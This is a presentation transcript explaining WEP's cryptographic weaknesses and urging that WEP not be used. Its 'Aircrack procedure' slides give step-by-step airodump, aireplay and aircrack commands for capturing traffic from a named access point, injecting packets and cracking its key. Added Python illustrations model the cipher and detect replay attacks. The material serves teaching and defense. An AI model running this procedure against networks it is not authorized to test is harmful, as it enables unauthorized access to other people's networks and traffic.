The Trouble with WEP Or, cracking WiFi networks for fun & profit (not really) Jim Owens.

Presentation transcript:


Overview
- Background and a little history
- How WEP works
- WEP's major weaknesses
- A short course in wardriving
  - Using Kismet to scout out the wireless landscape
  - Zeroing in with the aircrack-ng suite
    - airodump, to capture traffic
    - aireplay, to replay weakly encrypted packets
    - aircrack, to find the key using statistical methods

Background & history...
- Wired Equivalent Privacy
- Adopted in 1999 as part of the 802.11 standard
- Later swallowed whole by the 802.11b standard
- Initially used only 40-bit encryption keys, due to technology export restrictions
- Later expanded to 104-bit keys when export restrictions were eased
- Used 6 times as often as WPA/WPA2 despite known fatal weakness* (85% / 14% / 1%)
*Based on a 2006 survey in the Seattle area

How WEP works
1. Plain text gets CRC-32 checksum appended
2. 24-bit initialization vector pre-pended to key as a seed for RC4 key scheduling algorithm
3. RC4's pseudo-random generation algorithm outputs keystream
4. Keystream XORed with plain text
5. IV in plain text pre-pended to message
6. On receipt, keystream regenerated and XORed with cipher text to produce plain text

WEP's major weaknesses
- IV space too small (2^24)
  - On a busy network, IVs must repeat in <= 5 hours
  - 50% probability that an IV repeats within 5,000 packets
- RC4 key scheduling produces "weak" IVs from which a key byte can be correctly guessed 5% or 13% of the time
- No key management; typically just one key
- IP traffic contains much known plaintext data
- Open to injected traffic that is rebroadcast
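A minimal model of the "How WEP works" steps above, added here as an illustration and not part of the slides, which also shows why the first weakness matters: two frames under one IV share a keystream, and the birthday bound reproduces the 5,000-packet / 5-hour figures. Key, IV and plaintexts are constructed values; the RC4 and CRC-32 ICV handling follows the slide's description, not any real driver's code.

```python
# Minimal WEP model added for illustration; not from the slides.
import math
import struct
import zlib

def rc4_keystream(key, length):
    """RC4: key-scheduling algorithm, then PRGA emitting `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(key, iv, plaintext):
    """Slide steps 1-5: append CRC-32 ICV, seed RC4 with IV||key, XOR, send IV in clear."""
    assert len(iv) == 3, "WEP uses a 24-bit IV"
    data = plaintext + struct.pack("<I", zlib.crc32(plaintext))  # step 1
    keystream = rc4_keystream(iv + key, len(data))               # steps 2-3
    return iv + xor(data, keystream)                             # steps 4-5

def wep_decrypt(key, frame):
    """Slide step 6: rebuild keystream from the cleartext IV; None if the ICV does not match."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4_keystream(iv + key, len(body)))
    plaintext, icv = data[:-4], data[-4:]
    return plaintext if struct.pack("<I", zlib.crc32(plaintext)) == icv else None

def iv_reuse_leak(key, iv, p1, p2):
    """Same IV twice => same keystream, so c1 XOR c2 == p1 XOR p2 with no key needed."""
    c1 = wep_encrypt(key, iv, p1)[3:]
    c2 = wep_encrypt(key, iv, p2)[3:]
    return xor(c1, c2)

def iv_collision_probability(packets, iv_bits=24):
    """Birthday bound: probability that some IV repeats among `packets` random IVs."""
    return 1.0 - math.exp(-packets * (packets - 1) / (2.0 * 2 ** iv_bits))

def iv_exhaustion_hours(packets_per_second, iv_bits=24):
    """Hours until a sequential IV counter must wrap at the given frame rate."""
    return 2 ** iv_bits / packets_per_second / 3600.0
```

At 5,000 random IVs the collision probability is about 0.52, and a sequential counter at 1,000 frames per second wraps in about 4.7 hours, matching the slide's figures.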

Wardriving: Kismet
- Network detector, sniffer, IDS
- Works on 802.11b, a, g networks
- Uses passive monitoring, so hard to detect
- Logs sniffed packets in formats compatible with Wireshark/Tcpdump, Airsnort
- Channel surfs automatically
- Optionally supports GPS for network location

Kismet: Install & configure
- Binary packages available for most systems
- Requires a WiFi adapter that supports monitor mode as "capture source"
- Logs traffic in popular formats*
- Specify source in /etc/kismet/kismet.conf as driver,device,source_name:
    source=ipw2200,eth1,Stella
*Wireshark, Airsnort, etc.

Stella, the WiFi attack animal!

Wardriving: Recon phase
- Use Kismet to survey the WiFi landscape and to choose a target network
- Record necessary data for the Aircrack attack:
  - Channel number?
  - SSID?
  - Access point MAC address?

Wardriving: Kismet

Wardriving: Attack phase
- Aircrack-ng: software for network detection, sniffing, WEP cracking, and analysis
- Works on 802.11b, a, g
- Uses passive monitoring & packet injection
- Main tools:
  - aircrack-ng: cracking
  - airdecap: packet decryption
  - airmon: monitor mode switching
  - aireplay: packet injection (Linux only)
  - airodump: exports traffic to .cap files

Wardriving: Aircrack procedure
1. Bring up adapter on target's channel in monitor mode:
    # ifconfig wlan0 up
    # iwconfig wlan0 mode Monitor channel 9
2. Capture packets to file on channel, IVs only:
    # airodump wlan0 ./berlin_dump 9 1

Wardriving: Airodump

Wardriving: Aircrack procedure
3. Find weakly-encrypted packets to replay in interactive mode:
    # aireplay -2 -b 00:14:6C:40:BA:A6 -x 512 wlan0
4. Finally, crack WEP key with captured IVs:
    # aircrack -n 64 berlin-dump.ivs
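Seen from the access point's side, the replay step above has a distinctive signature: one captured frame re-sent hundreds of times a second, so the same BSSID, IV and ciphertext recur within a short window, and IVs repeat long before any counter wraparound. The detector below is an added example, not part of the slides or the aircrack-ng suite; the capture it scans is constructed inline and reuses the slide's BSSID only as a label.

```python
# Added illustration, not from the slides: flag WEP replay injection in a capture.
# aireplay's -2 mode re-sends one captured frame hundreds of times per second, so a
# monitor sees the same (BSSID, IV, ciphertext) tuple repeated in a short window.
BSSID = "00:14:6C:40:BA:A6"  # the access point from the slides, reused as a label

def constructed_capture():
    """Constructed sample: 200 ordinary frames with fresh IVs, then one frame replayed 600 times in ~1 s."""
    normal = [(i / 100.0, BSSID, f"{i:06x}", f"{i:04x}") for i in range(200)]
    replay = [(2.0 + i / 600.0, BSSID, "0a0b0c", "deadbeef") for i in range(600)]
    return normal + replay

def find_replays(frames, window=1.0, threshold=100):
    """Return {(bssid, iv, body): peak count} for frames repeated >= threshold times inside any `window` seconds."""
    times_by_key = {}
    for t, bssid, iv, body in frames:
        times_by_key.setdefault((bssid, iv, body), []).append(t)
    alerts = {}
    for key, times in times_by_key.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):          # sliding window over timestamps
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[key] = peak
    return alerts

def iv_reuse_count(frames):
    """Frames per BSSID whose IV was already seen; on a legitimate network this stays zero until the IV counter wraps."""
    seen, reused = set(), {}
    for _, bssid, iv, _ in frames:
        if (bssid, iv) in seen:
            reused[bssid] = reused.get(bssid, 0) + 1
        seen.add((bssid, iv))
    return reused
```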

Wardriving: Aireplay

Wardriving: Aircrack

Summary
- WEP has numerous serious flaws
- WEP's flaws are thoroughly documented
- WEP is readily exploitable in a short time, by unskilled attackers, using readily available tools
- Strong protection is readily available
- Bottom line: Don't use WEP, period!

Questions?